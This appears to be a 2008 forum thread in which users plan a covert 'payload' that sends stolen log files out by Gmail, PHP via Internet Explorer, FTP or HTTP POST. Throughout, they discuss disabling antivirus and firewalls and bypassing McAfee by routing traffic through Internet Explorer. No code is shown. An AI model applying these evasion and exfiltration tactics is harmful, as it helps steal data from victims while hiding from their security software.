> How about doing the PHP log transfer thing with AutoIt? When most programs are run, whether using PHP or SMTP, they always trigger a question from decent firewalls: DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?

Of course! I didn't think about it, but I agree that any firewall will trigger on the program while it accesses the Internet... Then we'll see what you have been working on when you have it done.
X3N Posted December 23, 2008

> Of course! I didn't think about it, but I agree that any firewall will trigger on the program while it accesses the Internet... Then we'll see what you have been working on when you have it done.

There are many ways to get the log file out, but I kinda prefer the Gmail method using AutoIT because you don't have to use any external programs... Any normal hardware firewall should allow you email access; the problem that you're talking about is in regards to software firewalls, which you should probably disable before running this payload anyways... with a method like the AV killer programs...
sc0rpi0 Posted December 23, 2008

> There are many ways to get the log file out, but I kinda prefer the Gmail method using AutoIT because you don't have to use any external programs... Any normal hardware firewall should allow you email access; the problem that you're talking about is in regards to software firewalls, which you should probably disable before running this payload anyways... with a method like the AV killer programs...

I have McAfee (and so do most of the people I know). I know for a fact that most people *do not* use hardware firewalls. The McAfee firewall blocks all attempts made by the AutoIt program. I have made numerous attempts to "disable" my McAfee firewall (process killing, etc.). The only thing left would be to permanently disable the program (leaving massive tracks). The best solution is to bypass the firewall using a commonly used universal program (hence Internet Explorer).
DMilton Posted December 24, 2008

Yes, the problem is with any firewall software; then there's another problem, which is disabling the firewall software. You can do it in Windows, but you must kill the task with other firewall software... Then double problem! One: disable the antivirus... Two: disable the firewall... With the batch method, you don't need to disable (or allow) anything but the antivirus software. Please correct me if it is not as I'm saying. I think a good solution is calling a batch from the AutoIT program, giving it the correct parameters in variables and doing the task with the batch. Another way could be using different methods (FTP, HTTP POST, email), selectable by the user in a pre-configuration (via the GUI) to send the logs, and calling different batches from the compiled exe with the options selected. Then the payload would work for anyone using it.
X3N Posted December 24, 2008

> Yes, the problem is with any firewall software; then there's another problem, which is disabling the firewall software. You can do it in Windows, but you must kill the task with other firewall software... Then double problem! One: disable the antivirus... Two: disable the firewall... With the batch method, you don't need to disable (or allow) anything but the antivirus software. Please correct me if it is not as I'm saying. I think a good solution is calling a batch from the AutoIT program, giving it the correct parameters in variables and doing the task with the batch. Another way could be using different methods (FTP, HTTP POST, email), selectable by the user in a pre-configuration (via the GUI) to send the logs, and calling different batches from the compiled exe with the options selected. Then the payload would work for anyone using it.

Well, if you want, you can add the AutoIT executable and call the script from a bat script, because all you need is the standalone AutoIT executable to run the scripts without compiling them. I'm not against using the IE PHP method; I just prefer the Gmail method... plus I don't have access to my own webserver yet.